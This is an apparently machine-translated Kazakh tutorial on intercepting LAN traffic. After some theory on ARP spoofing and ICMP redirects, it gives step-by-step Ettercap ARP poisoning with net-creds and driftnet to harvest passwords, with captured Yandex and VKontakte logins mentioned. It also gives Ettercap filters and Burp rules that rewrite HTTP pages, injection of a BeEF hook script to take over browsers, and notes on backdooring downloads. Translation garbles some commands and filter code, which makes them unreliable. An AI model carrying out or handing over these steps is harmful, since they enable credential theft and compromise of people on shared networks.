үй › Орнату және баптау › Хакерлер трафикті қайта бағыттау үшін пайдаланады. Хакерлер шабуылының жолдары. Burp көмегімен деректер спуфингі

Хакерлер трафикті қайта бағыттау үшін пайдаланады. Хакерлер шабуылының жолдары. Burp көмегімен деректер спуфингі

Желілік трафикті ұстау әдістері

Желілік анализатор бағдарламалары арқылы желіні тыңдау бірінші, ең көп қарапайым түрдедеректерді ұстап алу.

Желіні тыңдаудан қорғау үшін өтініш жасаңыз арнайы бағдарламалар, мысалы, желілік трафикті тыңдайтын желідегі компьютерлерді анықтай алатын AntiSniff.

Өз мәселелерін шешу үшін иіске қарсы бағдарламалар желіде тыңдау құрылғыларының бар екендігінің арнайы белгісін пайдаланады - спиферлік компьютердің желілік картасы арнайы тыңдау режимінде болуы керек. Тыңдау режимінде желіге қосылған компьютерлер сыналатын хостқа жіберілген IP датаграммаларына арнайы жауап береді. Мысалы, тыңдау хосттары әдетте хост мекенжайына жіберілген датаграммаларды ғана емес, барлық кіріс трафикті өңдейді. AntiSniff тани алатын күдікті хост әрекетінің басқа белгілері бар.

Сөзсіз, тыңдау шабуылдаушы тұрғысынан өте пайдалы, өйткені ол көптеген пайдалы ақпаратты алуға мүмкіндік береді - желі арқылы берілетін парольдер, желілік компьютердің мекенжайлары, құпия деректер, хаттар және т.б. Дегенмен, қарапайым тыңдау хакердің деректерді өзгерту және бүлдіру үшін екі хост арасындағы желілік байланысқа кедергі келтіруіне жол бермейді. Бұл мәселені шешу үшін неғұрлым күрделі технология қажет.

Күріш. 1 жалған ARP сұраулары

А және В хосттары арасындағы желілік байланысты тоқтату үшін хакер ARP протоколын қалай пайдалана алатынын көрейік.

А және В хосттары арасындағы желілік трафикті тоқтату үшін хакер өзінің IP мекенжайын осы хосттарға мәжбүрлейді, осылайша А және В хабар алмасу кезінде осы жалған IP мекенжайын пайдаланады. Олардың IP мекенжайын енгізу үшін хакер келесі әрекеттерді орындайды.

Шабуылдаушы A және B хосттарының MAC мекенжайларын анықтайды, мысалы, W2RK бумасындағы nbtstat пәрменін пайдаланады.
Шабуылдаушы A және B хосттарының анықталған MAC мекенжайларына хабарламалар жібереді, олар компьютерлердің MAC мекенжайларына хосттардың IP мекенжайларын шешуге арналған сұрауларға жалған ARP жауаптары болып табылады. А хостына В хостының IP мекенжайы шабуылдаушы компьютерінің MAC мекенжайына сәйкес келетіні айтылады; В хостына А хостының IP мекенжайы да шабуылдаушы компьютерінің MAC мекенжайына сәйкес келетіні айтылады.
А және В хосттары қабылданған MAC мекенжайларын өздерінің ARP кэштеріне енгізеді, содан кейін оларды бір-біріне хабарламалар жіберу үшін пайдаланады. А және В IP мекенжайлары шабуылдаушы компьютерінің MAC мекенжайына сәйкес келетіндіктен, А және В хосттары ештеңеден бейхабар, өз хабарламаларымен қалағанын жасай алатын делдал арқылы байланысады.

UNIX желілерінде arpredirect сияқты жүйенің желілік трафикті бақылау және басқару утилиталары арқылы жалған ARP шабуылының бұл түрін жүзеге асыруға болады. Өкінішке орай, мұндай сенімді утилиталар Windows желілерінде іске асырылмаған сияқты. Мысалы, NTsecurity сайтында сіз желілік хосттар арасындағы трафикті қайта бағыттау құралы ретінде ұсынылған GrabitAII утилитасын жүктей аласыз. Дегенмен, GrabitAII утилитасының өнімділігін қарапайым тексеру оның өз функцияларын жүзеге асыруда әлі де толық табысқа жетпейтінін көрсетеді.

Желілік трафикті тоқтату үшін шабуылдаушы желілік маршрутизатордың нақты IP мекенжайын өзінің IP мекенжайымен алмастыра алады, мысалы, жалған ICMP Redirect хабарламаларын пайдалана отырып. RFC-1122 сәйкес, A хосты қабылданған Қайта бағыттау хабарын басқа хостқа жіберілген датаграммаға жауап ретінде түсіндіруі керек, мысалы, B. А хосты қабылданған Қайта бағыттау хабарының мазмұнына қарай Қайта бағыттау хабарындағы өз әрекеттерін анықтайды және егер Redirect жаңа маршрут бойынша датаграммаларды А-дан B-ге қайта бағыттау үшін орнатылған болса, дәл осылай A хосты орындалады.

Күріш. 2 Жалған бағыттау

Жалған бағыттауды орындау үшін шабуылдаушы ұйым туралы кейбір мәліметтерді білуі керек жергілікті желі, A хосты орналасқан жерде, атап айтқанда, трафик А хостынан В хостына жіберілетін маршрутизатордың IP мекенжайы. Бұны біле отырып, шабуылдаушы IP датаграммасын жасайды, онда бастапқы IP мекенжайы IP мекенжайы ретінде анықталады. маршрутизатор және алушы A хосты көрсетілген. Сондай-ақ, датаграммаға жаңа маршрутизатордың мекенжай өрісі шабуылдаушы компьютерінің IP мекенжайына орнатылған ICMP Redirect хабарламасы кіреді. Мұндай хабарламаны алғаннан кейін А хосты барлық хабарламаларды шабуылдаушы компьютерінің IP мекенжайына жібереді.

Мұндай шабуылдан қорғау үшін A хостында ICMP Redirect хабарламаларын өңдеуді өшіру керек (мысалы, желіаралық қалқанды пайдалану) және tracert командасы (Unix-те бұл tracerout пәрмені) шабуылдаушы компьютерінің IP мекенжайын аша алады. . Бұл утилиталар жергілікті желіде пайда болған, орнату кезінде қарастырылмаған қосымша бағытты таба алады, егер, әрине, желі әкімшісі қырағы болса.

Ұстаудың жоғарыда келтірілген мысалдары (бұл шабуылдаушылармен шектелмейді) егер деректерде құпия ақпарат болса, желі арқылы берілетін деректерді қорғау қажеттілігіне көз жеткізеді. Желілік трафикті ұстап қалудан қорғаудың бірден-бір әдісі криптографиялық алгоритмдер мен шифрлау хаттамаларын жүзеге асыратын және құпия ақпаратты ашуға және ауыстыруға жол бермейтін бағдарламаларды пайдалану болып табылады. Мұндай мәселелерді шешу үшін криптография қауіпсіз протоколдар арқылы жіберілетін хабарламаларды шифрлау, қол қою және аутентификациялау құралдарын қамтамасыз етеді.

Ақпарат алмасуды қорғаудың барлық криптографиялық әдістерінің практикалық орындалуын қамтамасыз етеді VPN желілері(Virtual Private Network - Virtual Private Networks).

TCP қосылымын тоқтату

Ең күрделі желілік трафикті тоқтату шабуылы TCP қосылымын ұрлау (TCP ұрлау) деп қарастырылуы керек, егер хакер TCP пакеттерін шабуылға ұшыраған хостқа генерациялау және жіберу арқылы хостпен ағымдағы байланыс сеансын үзеді. Әрі қарай, үзілген TCP қосылымын қалпына келтіру үшін TCP протоколының мүмкіндіктерін пайдалана отырып, хакер үзілген байланыс сеансын ұстап алады және оны ажыратылған клиенттің орнына жалғастырады.

TCP (Transmission Control Protocol) негізгі тасымалдау протоколдарының бірі болып табылады. OSI қабаты, бұл виртуалды байланыс арнасы арқылы логикалық байланыстарды орнатуға мүмкіндік береді. Пакеттер осы арна бойынша олардың ретін тіркей отырып жіберіледі және қабылданады, пакеттер ағыны бақыланады, бұрмаланған пакеттерді қайта жіберу ұйымдастырылады, сессия соңында байланыс арнасы бұзылады. TCP жалғыз протокол болып табылады негізгі протоколЖетілдірілген хабарлама және қосылымды сәйкестендіру жүйесі бар TCP / IP отбасынан.

Бағдарламалық жасақтама пакеттік снайферлеріне шолу

Барлық бағдарламалық жасақтамалық снайферлерді шамамен екі санатқа бөлуге болады: іске қосуды қолдайтын снайферлер пәрмен жолы, және графикалық интерфейспен иіскейді. Сонымен бірге, осы екі ерекшелікті біріктіретін иісшілдердің бар екенін байқаймыз. Сонымен қатар, снайферлер бір-бірінен қолдайтын протоколдарымен, ұсталған пакеттерді талдау тереңдігімен, сүзгілерді конфигурациялау мүмкіндігімен және басқа бағдарламалармен үйлесімділік мүмкіндігімен ерекшеленеді.

Әдетте, кез келген снифердің терезесі GUIүш облыстан тұрады. Біріншісі түсірілген пакеттердің қысқаша мазмұнын көрсетеді. Әдетте, бұл аймақта ең аз өрістер көрсетіледі, атап айтқанда: пакетті түсіру уақыты; Пакетті жіберуші мен алушының IP мекенжайлары; Пакет көзі және тағайындалған MAC мекенжайлары, бастапқы және тағайындалған порт мекенжайлары; протокол түрі (желі, көлік немесе қолданбалы деңгей); ұсталған деректер туралы кейбір жиынтық ақпарат. Екінші аймақ жеке таңдалған бума туралы статистикалық ақпаратты көрсетеді, ал соңында үшінші аймақ буманы он алтылық немесе таңба түрінде ұсынады - ASCII.

Барлық дерлік пакеттік снайферлер декодталған пакеттерді талдауға мүмкіндік береді (сондықтан дестелік снайферлер пакеттік анализаторлар немесе протокол анализаторлары деп те аталады). Снайфтер ұсталған пакеттерді қабаттар мен хаттамалар бойынша таратады. Кейбір пакеттік анализаторлар хаттаманы танып, түсірілген ақпаратты көрсете алады. Ақпараттың бұл түрі әдетте снайфтер терезесінің екінші аймағында көрсетіледі. Мысалы, кез келген снайферлер TCP протоколын тани алады және кеңейтілген снайферлер бұл трафикті қай қолданба жасағанын анықтай алады. Көптеген протокол анализаторлары 500-ден астам әртүрлі хаттамаларды таниды және оларды аты бойынша сипаттап, декодтай алады. Снайфер экранда шифрды ашып, көрсете алатын ақпарат неғұрлым көп болса, соғұрлым қолмен декодтау қажет болады.

Пакеттік снайферлер жұмыс істей алатын бір мәселе әдепкі порттан басқа портты пайдаланып протоколды дұрыс анықтай алмау болып табылады. Мысалы, қауіпсіздікті жақсарту үшін кейбір белгілі қолданбалар әдепкі порттардан басқа порттарды пайдалану үшін конфигурациялануы мүмкін. Сонымен, веб-сервер үшін сақталған дәстүрлі порт 80 орнына, берілген сервер 8088 портында немесе кез келген басқада қайта конфигурациялауға мәжбүр болуы мүмкін. Бұл жағдайда кейбір пакеттік анализаторлар хаттаманы дұрыс анықтай алмайды және тек төменгі деңгейдегі хаттама (TCP немесе UDP) туралы ақпаратты көрсете алмайды.

Бағдарламалық жасақтаманың аналитикалық модульдерімен бірге қосылатын модульдер немесе кірістірілген модульдер ретінде жеткізілетін бағдарламалық құралды сканерлеушілер бар, олар ұсталған трафик туралы пайдалы аналитикалық ақпараты бар есептерді жасауға мүмкіндік береді.

Көптеген бағдарламалық жасақтама пакеттік снайферлерінің тағы бір тән ерекшелігі трафик түсірілгенге дейін және кейін сүзгілерді конфигурациялау мүмкіндігі болып табылады. Сүзгілер белгілі бір пакеттерді жалпы трафиктен берілген критерий бойынша бөледі, бұл трафикті талдау кезінде қажет емес ақпараттан арылуға мүмкіндік береді.

Ettercap баламалары

Ettercap - ең танымал шабуыл бағдарламасы, бірақ ол ең жақсысы ма? Бүкіл нұсқаулықта сіз Ettercap ешқашан дерлік жалғыз пайдаланылмайтынын, бір немесе басқа бағдарлама әрқашан трафикті өңдеу тізбегінде онымен қатар жүретінін көресіз. Мүмкін, бұл икемділік қосады, жалпы алғанда, бұл тәсіл UNIX-тің негізінде жатыр - бір бағдарлама бір тапсырманы орындайды, ал соңғы пайдаланушы қажетті нәтижеге жету үшін әртүрлі бағдарламаларды біріктіреді. Бұл тәсілмен бағдарлама кодын сақтау оңайырақ, мұндай миниатюралық «кірпіштерді» кез келген күрделілік пен икемділік жүйесін құру үшін пайдалануға болады. Соған қарамастан, әр түрлі тапсырмалары бар бес ашық консольдің болуы, олардың жұмысы бір нәтижеге жетуге бағытталған бағдарламалар өте ыңғайлы емес, бұл қиынырақ, қандай да бір кезеңде қателесу мүмкіндігі бар және бүкіл конфигурацияланған жүйе бос жұмыс істейді.

Net-Creds иіскейді:

Барған URL мекенжайлары
POST сұрауларын жіберді
HTTP пішіндеріндегі логиндер/парольдер
негізгі HTTP аутентификациясына арналған логиндер/парольдер
HTTP іздеулері
FTP логиндері/парольдері
IRC логиндері/парольдері
POP логиндері/парольдері
IMAP логиндері/құпиясөздері
Telnet логиндері/парольдері
SMTP логиндері/парольдері
SNMP қауымдастық жолы
HTTP, SMB, LDAP және т.б. сияқты барлық қолдау көрсетілетін NTLMv1/v2 протоколдары.
Керберос

Ұсталған кескіндердің жақсы таңдауы және driftnet осыған байланысты қарапайым - ол тек ұсталған кескіндерді көрсетеді.

Құрылғыны қайта жіберу режиміне ауыстырыңыз.

echo "1" > /proc/sys/net/ipv4/ip_forward

Ettercap қолданбасын GUI (-G ) арқылы іске қосыңыз:

Ettercap-G

Енді Хосттарды таңдаңыз, оның ішкі тармағында Хосттарды сканерлеу . Сканерлеу аяқталғаннан кейін Хосттар тізімін таңдаңыз:

Target1 ретінде маршрутизаторды таңдаңыз (Мақсатты 1 қосу), Target2 ретінде шабуыл жасайтын құрылғыны таңдаңыз (2-мақсатқа қосу).

Бірақ мұнда бірінші кедергі туындауы мүмкін, әсіресе хосттар көп болса. Әртүрлі нұсқауларда, соның ішінде жоғарыда ұсынылған бейнеде, авторлар мақсатты құрылғыға көтеріледі (белгілі бір себептермен барлығында Windows бар) және жергілікті желіде осы машинаның IP-ін қарау пәрменін пайдаланады. Келісіңіз, бұл опция нақты жағдайлар үшін қолайсыз.

арқылы сканерлесеңіз, біразын алуға болады Қосымша Ақпаратхосттар туралы, дәлірек айтқанда, желілік карта өндірушісі туралы:

nmap -sn 192.168.1.0/24

Егер деректер әлі де жеткіліксіз болса, ОЖ анықтамасымен сканерлеуді орындауға болады:

nmap -O 192.168.1.0/24

Көріп отырғаныңыздай, IP 192.168.1.33 бар машина Windows болып шықты, егер бұл жоғарыдан келген белгі болмаса, онда бұл не? 😉 lol

Міне, біз екінші мақсат ретінде қосамыз.

Енді Mitm мәзір элементіне өтіңіз. Онда ARP улану тармағын таңдаңыз... Қашықтағы қосылымдарды иіскеу құсбелгісін қойыңыз.

Біз егін жинауды бастаймыз, бір терезеде іске қосамыз

Таза несиелер

басқасында (екі бағдарламаны да опциясыз іске қосуға болады)

дрейф торы

Деректер жинау бірден басталды.

Оң жақта driftnet түсірілген суреттерді көрсететін басқа терезені ашты. Net-creds терезесінде біз кірген сайттарды және ұсталған құпия сөздерді көреміз:

1.2 Ettercap + Burp Suite
3. Ettercap қолданбасында деректерді (кірген веб-сайттар мен алынған құпия сөздер) қараңыз

Көрініс мәзірінде Қосылымдар және Профильдер қойындылары бізге қолжетімді. Сондай-ақ, IP мекенжайларын шешу жолағын белгілеуге болады. Қосылымдар, әрине, байланыстар. Ettercap өзі тапқан әрбір хост үшін жадтағы профильдерді жинайды. Онда пайдаланушылар мен парольдер жиналады. Бұл жағдайда түсірілген тіркелгі деректері (құпия сөздер) бар профильдер крестпен белгіленеді:

Профильдерге тым көп сенбеңіз - мысалы, FTP және басқа қызметтер үшін ұсталған логиндер мен парольдер белгіленген, олар үшін бағдарлама тіркелгі деректері ретінде алынған ақпаратты сөзсіз түсіндіре алады. Бұған, мысалы, аутентификацияның негізгі деректері, веб-пішіндердегі енгізілген логиндер мен құпия сөздер кірмейді.

Қосылымдарда ең перспективалы деректер жұлдызшамен белгіленеді:

Мәліметтерді көру үшін осы жазбаларды екі рет басуға болады:

Бүкіл тізімде бұл жұлдыздарды іздемеу үшін осы өріс бойынша сұрыптауға болады және олардың барлығы жоғарғы немесе төменгі жағында болады:

Негізгі аутентификация ұсталды:

Яндекс үшін логин-пароль (төменде белгіленген):

Бұл Вконтакте үшін ұсталған тіркелгі деректері:

Сондай-ақ, ең қызықты деректер төменгі консольде жиналады:

Бағдарламаның нәтижелерін сақтағыңыз келсе, осы опцияларды пайдаланыңыз (Ettercap іске қосу кезінде пернелерді көрсетіңіз:

Тіркеу опциялары: -w, --жазылған деректерді pcapfile-ге жазу -L, --log барлық трафикті осыған жазу -l, --log-info осыған тек пассивті ақпаратты жазу -m, --log-msg барлық хабарламаларды жазу бұған -c, --compress журнал файлдары үшін gzip қысуын пайдаланыңыз

4. Ettercap бағдарламасында деректерді жылдам ауыстыру
4.1 Пайдаланушы Ettercap сүзгілерін пайдалану

Ескерту: Менің барлық тестілеуімде Ettercap сүзгілері жұмыс істемеді. Оның қолында, аппараттық құрал мүмкіндіктерінде немесе бағдарламаның өзінде қате бар екенін түсіну қиын ... Бірақ 0.8.2 нұсқасы (қазіргі уақытта ең соңғысы) үшін сүзгілерге қатысты мәселелер туралы қате туралы есеп бар. Жалпы, қателер туралы есептер мен форумдарға қарағанда, сүзгілер жиі түсіп кетеді немесе ұзақ уақыт бойы жұмыс істемейді. 5 ай бұрын өзгертілген филиал бар https://github.com/Ettercap/ettercap/tree/filter-improvements, яғни. сүзгі жақсартулары (сүзгі жақсартуларымен). Осы филиалға және репозиторий нұсқасына көптеген сынақтар жасалды, әртүрлі сүзгілер әртүрлі жағдайларда сынақтан өтті, көп уақыт жұмсалды, бірақ нәтиже болмады. Айтпақшы, Kali Linux жүйесінде сүзгілерді жақсарту нұсқасын орнату үшін мынаны орындау керек:

sudo apt-get ettercap-графикалық ettercap-жалпы sudo apt-get орнату git debhelper bison тексеру cmake flex ghostscript libbsd-dev libcurl4-openssl-dev libgtk2.0-dev libltdl-dev libluajit-5.1-dev libluajit-5.1-curlib1vde libpcap-dev libpcre3-dev libssl-dev libgtk-3-dev ghostscript groff libtool libpcre3 libncurses5-dev git clone -b filter-improvements https://github.com/Ettercap/ettercap.git cd ettercap build/cddfcs build_dmk =Қосулы ../ sudo make install орнатыңыз

Жалпы, сүзгілеріңіз жұмыс істемесе, сіз жалғыз емессіз. Ettercap нұсқауларында мен сүзгілер тақырыбын өткізіп жібере алмаймын, сондықтан олар бәрібір қарастырылады.

Осы уақытқа дейін біз ARP жалғандығы үшін Ettercap қолданып келдік. Бұл өте үстірт қолданба. Теңшелетін сүзгілердің арқасында біз трафикті жылдам өзгерте аламыз. Сүзгілер бөлек файлдарда болуы және пайдалану алдында Etterfilter бағдарламасымен құрастырылуы керек. Байланыстырылған құжаттама сирек болып көрінсе де, бірақ төмендегі мысалдармен біріктірілген болса да, ол сізге өте қызықты сүзгілерді жазуға мүмкіндік береді.

Бірінші фильтрімізді жасайық, ол барлық кескіндерді мынамен ауыстырады:

img_replacer.filter деп аталатын файлда көшіру:

Егер (ip.proto == TCP && tcp.dst == 80) ( егер (іздеу(DATA.data, "Қабылдау-кодтау"))) ( ауыстырыңыз("Қабылдау-кодтау", "Қабылдау-қоқыс!"); # Ескертпе: ауыстыру жолы бастапқы хабармен бірдей ұзындықта ("zapped Accept-Encoding!\n"); ) ) if (ip.proto == TCP && tcp.src == 80) ( replace("src=") , " src=\"http://www.irongeek.com/images/jollypwn.png\" "); ауыстырыңыз("SRC=", "src=\"http://www.irongeek.com/images/ jollypwn. png\" "); ауыстыру("src=", "src=\"http://www.irongeek.com/images/jollypwn.png\" "); ауыстыру("SRC=", "src= \" http://www.irongeek.com/images/jollypwn.png\" "); msg("Сүзгі орындалды.\n"); )

Файлды құрастырыңыз:

Etterfilter img_replacer.filter -o img_replacer.ef

Құрастыру нәтижелері:

Etterfilter 0.8.2 авторлық құқық 2001-2015 Ettercap әзірлеу тобы 14 хаттамалық кестелер жүктелді: DECODED DATA udp tcp esp gre icmp ipv6 ip arp wifi fddi tr және 13 тұрақты мәндер жүктелді: VRRP OSPF ESPMP GRE UDP IPCP6 IPPPing IPPPing файл "img_replacer.filter" аяқталды. Мета-ағашты ашу аяқталды. Белгілерді нақты ығыстыруға түрлендіру аяқталды. "img_replacer.ef" файлына шығуды жазу аяқталды. -> 18 нұсқауға кодталған сценарий.

-F қосқышы бағдарламаға қосқыштан кейінгі файлдан сүзгіні жүктеуді айтады. Компиляциядан кейін сүзгісі бар жаңа файлымыздың атауы img_replacer.ef болады, сондықтан пәрмен келесідей болады:

Ettercap -G -F img_replacer.ef

Ескертпе: Веб-трафикті бақылаған кезде, сіз көретін пакеттер шифрланған пішінде болуы мүмкін. Үшін тиімді жұмыссүзгілер, Ettercap пішіндегі трафикті қажет етеді кәдімгі мәтін. Кейбір бақылауларға сәйкес, веб-беттер қолданатын кодтау түрі «Қабылдау-кодтау: gzip, deflate» болып табылады.

Төменде кәдімгі мәтін түрінде байланысты мәжбүрлеп, кодтауды қайта жазатын сүзгі берілген:

Егер (ip.proto == TCP && tcp.dst == 80) ( егер (search(DATA.data, "gzip"))) ( replace("gzip", " "); # ескертпе: хабарлама жолында төрт бос орын ауыстыру ("ақталған gzip\n"); ) ) егер (ip.proto == TCP && tcp.dst == 80) ( егер (search(DATA.data, "deflate"))) ( replace("deflate", " "); # ескертпе: ауыстыру жолында жеті бос орын msg("ақталған деflate\n"); ) )

Сүзгілерді жазу синтаксисі егжей-тегжейлі сипатталған, содан кейін тағы бірнеше мысалдар:

# пакеттегі мәтінді ауыстыру: егер (ip.proto == TCP && іздеу(DATA.data, "lol"))( replace("lol", "smh"); msg("сүзгі орындалды"); ) # хабарды көрсету егер tcp порты 22 болса if (ip.proto == TCP) ( if (tcp.src == 22 || tcp.dst == 22) ( msg("SSH пакеті\n"); ) ) # барлық telnet трафигін тіркеу , сонымен қатар әрбір пакет үшін ./program орындаңыз, if (ip.proto == TCP) ( if (tcp.src == 23 || tcp.dst == 23) ( log(DATA.data, "./logfile.log") ; exec("./program"); ) ) # егер http қоспағанда (ip.proto == TCP && tcp.src != 80 && tcp.dst != 80) ( log(DATA.data ,) қоспағанда, барлық трафикті тіркеу "./logfile.log"); ) # кейбір пакеттік пайдалы жүктеме операциялары, егер (DATA.data + 20 == 0x4142) ( DATA.data + 20 = 0x4243; ) басқа ( DATA.data = "өзгертілген"; DATA .data + 20 = 0x4445; ) # "ettercap" бар барлық пакеттерді тастаңыз if (search(DECODED.data, "ettercap")) ( msg("біреу біз туралы айтып жатыр...\n"); drop( ); kill( ); ) # regex сәйкес келетін шифры шешілген ssh пакеттерін жазу if (ip.proto == TCP) ( if (tcp.src == 22 ||) tcp.dst == 22) ( if (regex(DECODED.data, ".*login.*")) ( log(DECODED.data, "./decrypted_log"); ) ) ) # жою пакеттері, егер (ip.ttl).< 5) { msg("The packet will die soon\n"); } # то же самое для IPv6, но делая тривиальный тест убеждаемся, что перед нами действительно IPv6 пакеты if (eth.proto == IP6 && ipv6.hl < 5) { msg("The IPv6 packet will die soon\n"); } # сравнение строки на данный сдвиг if (DATA.data + 40 == "ette") { log(DATA.data, "./logfile"); } # вставить файл после указанного пакета if (tcp.src == 21 && search(DATA.data, "root")) { inject("./fake_response"); } # целиком заменить пакет на другой if (tcp.src == 23 && search(DATA.data, "microsoft")) { drop(); inject("./fake_telnet"); } # Изменение бинарных данных используя внешнюю программу if (udp.dst == 53 && pcre_regex(DATA.data, ".*\x03com\x00.*")) { log(DATA.data, "/tmp/payload"); drop(); execinject("/bin/sed "s/\x03com\x00/\x02my\x04page\x02de\x00/g" /tmp/payload"); udp.len += 7; exec("/bin/rm /tmp/payload"); msg("faked"); } # фильтровать только указанный IP адрес if (ip.src == "192.168.0.2") { drop(); } # делать то же самое для IPv6 if (ipv6.src == "2001:db8::1") { drop(); } # комбинируем IPv4 и IPv6 if (eth.proto == IP && ip.dst == "192.168.0.2") { msg("drop IPv4"); drop(); } if (eth.proto == IP6 && ipv6.dst == "2001:db8::1") { msg("drop IPv6"); drop(); } # транслировать tcp пакеты с порта 80 на 81 if (tcp.dst == 80) { tcp.dst -= 1; tcp.dst += 2; } # найти и покалечить пакеты ESP if (ip.proto == ESP) { DATA.data = "DEADDECAF"; }

4.2 Burp көмегімен деректердің спуфингі

Біз Ettercap және Burp-ті 1.2-тармақта немесе 2.2-тармақта сипатталғандай іске қосамыз.

Burp ішінде Прокси -> Параметрлер тармағына өтіңіз. Біз сол жерден Сәйкестендіру және ауыстыруды табамыз. Жаңа ереже қосу үшін Қосу түймесін басыңыз.

Сұраныс тақырыбы - сұрау тақырыбы
Сұраныс органы – сұрау органы
Жауап тақырыбы - жауап тақырыбы
Жауап беру органы – жауап денесі
Параметр атауын сұрау - Сұраныс параметрінің атауы
Параметр мәнін сұрау - параметр мәнін сұрау
Сұраныс бірінші жолы - сұраудың бірінші жолы

Егер GET әдісімен берілетін деректерді өзгерту қажет болса, онда бұл тақырыптарға қатысты.

HTML белгілеуінде head (head тегі) сияқты нәрсе де бар. Жоғарыда аталғандардың бұл тақырыпқа еш қатысы жоқ. Пакет тақырыптары туралы сәл жоғарырақ айтылған. Мазмұнды өзгерткіңіз келсе HTML беттері, содан кейін бас тегтің мазмұнын (мысалы, тақырып) өзгерткіңіз келсе де, Сұраныс тақырыбының орнына әрқашан Жауап мәтінін таңдауыңыз керек.

Егер сіз таныс болмасаңыз тұрақты тіркестер, содан кейін, негізінен, бәрі жақсы: HTML көп нәрсені кешіреді, ал түсінбейтін нәрсені елемейді - сіз оны пайдалана аласыз. Тұрақты тіркестерді қолдануды білсеңіз, мен сізді құрметтеймін.)))

Мысалы, жаңа ереже жасайық, Сұраныс тақырыбын Жауап мәтініне өзгертейік. Ереженің өзінде біз өзгереміз

атауы жоқ

Regex сәйкестігі үшін құсбелгіні қойыңыз.

Енді барлық сайттарда (HTTPS жоқ) тақырыптың орнына Тақырып жоқ болады:

Негізгі тегтен кейін ерікті жолды енгізіңіз (ол мәтіндегі бірінші жол болады). Сұраныс тақырыбы Жауап мәтініне өзгертілді. Біз өзгереміз

Regex сәйкестігі үшін құсбелгіні қойыңыз.

Жоғарғы оң жақ бұрышта (орналасуға байланысты) «Мен жақсымын!» деген жазу пайда болады. Сіз CSS, JavaScript кодын, кез келген мәтінді - кез келген нәрсені кірістіре аласыз. Сіз парақтан бәрін жоя аласыз, содан кейін оны өзіңіздің мазмұныңызбен толтыра аласыз - бәрі сіздің қиялыңызға байланысты.

Деректер бастапқы серверге және шабуылдаушы серверіне жіберілетіндей әрбір пішінді сәл өзгерту идеясы болды (әр пішін үшін көп жіберуді жүзеге асыру). Бірақ егер жіберілген деректер шифрланбаса және біз оған қол жеткізе алатын болсақ, біз оны бәрібір көреміз, оны кез келген серверге жіберудің қажеті жоқ деп есептейміз. Дегенмен, егер біреу қажет болса, деректерді бір пішіннен бірден бірнеше серверге жіберудің шынымен жұмыс істейтін мысалы.

5. BeEF қосылуы

BeEF мүмкіндіктерін пайдалануды бастау үшін HTML-ге JavaScript файлын ендіру керек, әдетте келесідей жол:

Келесі екі әдіс тек осы жолды ендіру әдісімен ерекшеленеді.

5.1 Ettercap сүзгілерімен BeEF ілмектері

[бөлім кейінірек дайындалады]

5.2 BeEF-ті Burp көмегімен ілмек

4.2-тармақта жазылғандай дәл осылай бастау керек. Бірақ тақырыптарды ауыстырудың және сайтқа мәтін қосудың орнына, біз JavaScript кодын жол ретінде енгіземіз:

Менің жағдайда бұл файл 3000 портында IP 192.168.1.36 қол жетімді. Файл hook.js деп аталады (оны параметрлерде өзгертуге болады). Анау. менің жағдайда сызықты енгізу керек:

Мұны, мысалы, жаңа ереже жасау арқылы, Сұраныс тақырыбын Жауап мәтініне өзгерту арқылы жасауға болады. HTML кодының өзінде ауыстыру болуы керек

Керемет, HTTPS жоқ кез келген сайтты ашқанда, HTML кодына JavaScript коды кірістірілген, ол қосылған браузер арқылы ақпаратты жинауға және әртүрлі шабуылдарды орындауға мүмкіндік береді:

6. Бэкдорлармен инфекция

Орындалатын файлдарды Ettercap сүзгілерінің көмегімен [белгілі бір себептермен ұзақ уақыт бойы жұмыс істемейтін] көмегімен де ауыстыруға және жұқтыруға болады. үшінші тарап қолданбалары. Мысалы, BDFProxy мұны жылдам орындай алады. Өкінішке орай, BDFProxy әлі сәуірде (2016 жылы) Backdoor Factory жаңартуынан қалпына келтіре алмайды: Python-да libmproxy бумасы mitmproxy деп өзгертілді. BDFProxy үшін libmproxy бумасы қажетті тәуелділік болып табылады; бұл бумасыз бағдарлама жұмыс істемейді. Сондықтан, қазір, BDFProxy «жөндеуіне» дейін оны пайдалану мүмкін емес, өйткені Backdoor Factory орнатылған болса да, BDFProxy бағдарламасы libmproxy кітапханасының жоқтығына шағымданады ...

Ұқсас операцияны Burp Suite арқылы жасауға болады. Қадамдық алгоритм ұсынылған, оны осы бөлімде қайта жазудың мағынасы жоқ.

7. Ettercap плагиндерін пайдалану

Ettercap плагиндері туралы ақпаратты табуға болады. Бірнеше плагиндер бар, төменде сипатталғандары маған ең қызықты болып көрінеді.

Плагиндерді Ettercap іске қосқан кезде қосуға болады, бұл үшін опция бар:

P, --plugin оны іске қосыңыз

Плагиндерді графикалық интерфейстен де жүктеуге болады:

[МАТЕРИАЛ ДАЙЫНДАЛУДА]

7.1 arp_cop

Ол ARP сұрауларын/жауаптарын пассивті бақылау арқылы күдікті ARP әрекетін хабарлайды. Ол ARP улану әрекеттері немесе қарапайым IP қақтығыстары немесе IP өзгерістері туралы хабарлауы мүмкін. Егер сіз хосттардың бастапқы тізімін жасап жатсаңыз, онда плагин дәлірек жұмыс істейді.

Ettercap -TQP arp_cop //

ARP жалғандығын анықтаудың мысалы:

Кеңейту

Mial@HackWare-Mint ~ $ sudo ettercap -TQP arp_cop // mial үшін құпия сөз: ettercap 0.8.2 авторлық құқық 2001-2015 Ettercap әзірлеу тобы Тыңдау күні: eth0 -> 08:00:27:A3:08:4A 192.16/. 255.255.255.0 fe80::a00:27ff:fea3:84a/64 SSL диссекциясы etter.conf файлында жарамды "redir_command_on" сценарийін қажет етеді Артықшылықтар EUID 65534 EGID 65534... ажыратылған сатушы саусақ ізі 1766 tcp ОЖ саусақ ізі 2182 белгілі қызметтер Сканерлеу үшін 255 хостты рандомизациялау... 255 хост үшін бүкіл желі маскасын сканерлеу... * |===================== ==============================>| 100,00 % Хосттар тізіміне 3 хост қосылды... Бірыңғай иіскеу басталуда... Тек мәтіндік интерфейс іске қосылды... Кірістірілген анықтама үшін «h» түймесін басыңыз arp_cop плагинін іске қосу... arp_cop: плагин іске қосылды... arp_cop: (жаңа хост ) 192.168.1.1 arp_cop: (ЕСКЕРТУ) 192.168.1.35 192.168.1.1 arp_cop: (ЕСКЕРТУ) 192.168.1.35 192.168.1.35 192.168.1.35 болып көрінеді (arp_cop.) (arp_cop.) (arp_cop.) 35 192.168.1.1 arp_cop болып көрінеді: (ЕСКЕРТУ ) 192.168.1.35 192.168.1.1 arp_cop болып көрінеді: (ЕСКЕРТУ) 192.168.1.35 192.168.1.1 arp_cop: (ЕСКЕРТУ) 192.168.1.1. arp_cop. : (ЕСКЕРТУ) 192.168.1.35 өзін 192.168. .1.1 arp_cop: 